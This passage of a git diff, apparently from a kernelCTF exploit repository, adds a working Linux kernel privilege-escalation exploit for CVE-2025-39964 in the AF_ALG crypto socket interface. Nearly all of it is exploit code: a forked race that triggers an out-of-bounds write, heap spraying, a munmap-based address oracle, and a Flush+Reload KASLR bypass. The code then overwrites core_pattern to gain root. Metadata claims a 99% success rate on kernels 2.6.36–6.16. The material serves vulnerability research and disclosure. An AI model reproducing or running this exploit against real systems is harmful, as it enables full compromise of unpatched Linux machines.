MSG_MORE)); + n = recv(opfd, buf, 0x1000, 0); + } + + /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is + * full) */ + send(opfd, buf, 0x1000, MSG_MORE); + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val))); + printf("setsockopt done\n"); + + /* + * Step 3 (race): fork two children that race each other: + * + * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes + * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail + * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0. + * + * Child B (send 0x200 bytes): sends a sub-page-size buffer so that + * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126. + * + * Desired outcome: both children finish such that ctx->merge == 1 AND the + * last tsgl has sgl->cur == 0. The next send() will then use sg[-1]. + */ + if (fork() == 0) { + /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */ + int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE); + printf("send3 %d\n", x); + exit(0); + } + + if (fork() == 0) { + /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to + * MAX_SGL_ENTS */ + int x = send(opfd, buf, 0x200, MSG_MORE); + printf("send2 %d\n", x); + exit(0); + } + + /* + * @sleep(desc="wait for both fork children to reach their send() calls and + * set ctx->merge=1 with sgl->cur=0 before we recv()") + */ + sleep(1); + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + wait(NULL); + + /* Step 4: release spray threads so they re-send their crafted payloads */ + for (int i = 0; i < THREAD_NUM; i++) { + write(cfd[1], buf, 1); + } + + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + + memset(buf, 'z', 0x1000); + wait(NULL); + + /* Step 5: map userspace oracle region for the binary search */ + allocate_map(); + + /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses + * sg[-1].page_link from our sprayed payload — triggering the OOB write. + * Returns -1 if the write destination is unmapped (race failed); 1 if mapped. + */ + int x = send(opfd, buf, 1, MSG_MORE); + + if (x == 1) { + puts("Race fail"); + exit(0); + } + + /* + * Step 5 (binary search oracle): + * + * Background: + * sg[-1].page_link is effectively a pointer to a struct page in vmemmap. + * The kernel computes the write destination as: + * dest = page_address(sg_page(sg)) + sg->offset + sg->length + * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE + * + offset + length + * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and + * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our + * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR). + * + * Oracle: + * send() returns 1 → the write destination is in a mapped page (success). + * send() returns -1 → the destination is unmapped (copy_from_user failed). + * By progressively munmap-ing halves of the oracle region we can determine + * which physical page corresponds to the OOB write target. + * + * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB): + * Each iteration j tests: "if I decrease page_link by half_range/64, does + * the write still succeed?" + * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each + * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap). + * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals + * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units. + * If the shifted oracle still succeeds → dest is in the *upper* half → + * unmap the lower half and advance start. + * Otherwise → dest is in the *lower* half → unmap the upper half. + */ + size_t oracle; + size_t leak_offset = 0; + int xcnt = 0; + for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6); + write(cfd[1], buf, 0x100); + buf[0] = 'a'; + x = send(opfd, buf, 1, MSG_MORE); + if (x == 1) { + puts(""); + xcnt++; + oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET]; + char *start = (void *)(0ULL); + for (int j = 0; j < 8; j++) { + printf("loop j: %d\n", j); + x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j))); + if (x == 1) { + xcnt++; + start += (SCAN_END_ADDR >> (1 + j)); /* upper half */ + munmap(start - (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } else { + munmap(start + (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + /* search_offset returns the exact userspace VA of the OOB-written page */ + leak_offset = search_offset(start) + xcnt; + printf("leak_offset %zx\n", leak_offset); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + + break; + } + } + + if (leak_offset == 0) + exit(0); + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + write(cfd[1], buf, 0x100); + + /* + * Step 6: redirect the OOB write to core_pattern. + * + * leak_offset is the VA of the currently-targeted physical page. + * core_pattern is the KASLR-adjusted kernel VA of core_pattern[]. + * + * First, align within-page: send adjust_offset bytes so that after the + * advance the write starts at the same within-page offset as core_pattern. + */ + size_t adjust_offset = + PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK); + leak_offset += adjust_offset; + + memset(buf, 'z', 0x1000); + SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE)); + SYSCHK(send(opfd, buf, 1, MSG_MORE)); + + printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1)); + if (*(char *)(leak_offset - 1) != 'z') + leak_offset -= 0x100000000ULL; + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + + /* + * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that + * page_address(sg_page(sg)) points to the physical page holding core_pattern. + * The >> 6 (or / 64) is actually a simplification of the formula + * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page + * index, and then multiply by 64 because each memory page has a page_struct + * that is exactly 64 bytes long. + * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via + * the formula described in the binary search comment above. + */ + + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] += + (((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6); + + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + write(cfd[1], buf, 0x100); + /* Step 6 (write): send the core_pattern string; kernel copies it to + * core_pattern[] */ + char mcore[64] = "|/proc/%P/fd/666 %P"; + SYSCHK(send(opfd, mcore, 64, MSG_MORE)); + PAUSE; + + return 0; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +void prefetch(void *p) { + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : + : "r"(p)); +} + +size_t flushandreload(void *addr) /* row miss */ +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * KASLR bypass via Flush+Reload side channel. + * + * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances). + * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant. + * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching + * source. + */ +// #define KASLR_BYPASS_INTEL +size_t bypass_kaslr(u64 base) { + if (!base) { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) { + u64 bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 9 +/* largest contiguous mapped area at the beginning of _stext */ +#define WINDOW_SIZE 11 + + while (1) { + u64 bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + return base; +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json new file mode 100644 index 000000000..304179dc7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ "exp413","exp415"], + "vulnerability": { + "cve": "CVE-2025-39964", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285", + "affected_versions": ["2.6.36 - 6.16"], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": ["CONFIG_CRYPTO_USER_API"] + } + }, + "exploits": { + "lts-6.12.44": { + "environment": "lts-6.12.44", + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "99% success rate" + }, + "mitigation-v4-6.6": { + "environment": "mitigation-v4-6.6", + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "99% success rate" + }, + "cos-121-18867.199.28": { + "environment": "cos-121-18867.199.28", + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "99% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz new file mode 100755 index 000000000..07252dbed Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz new file mode 100755 index 000000000..07252dbed Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz differ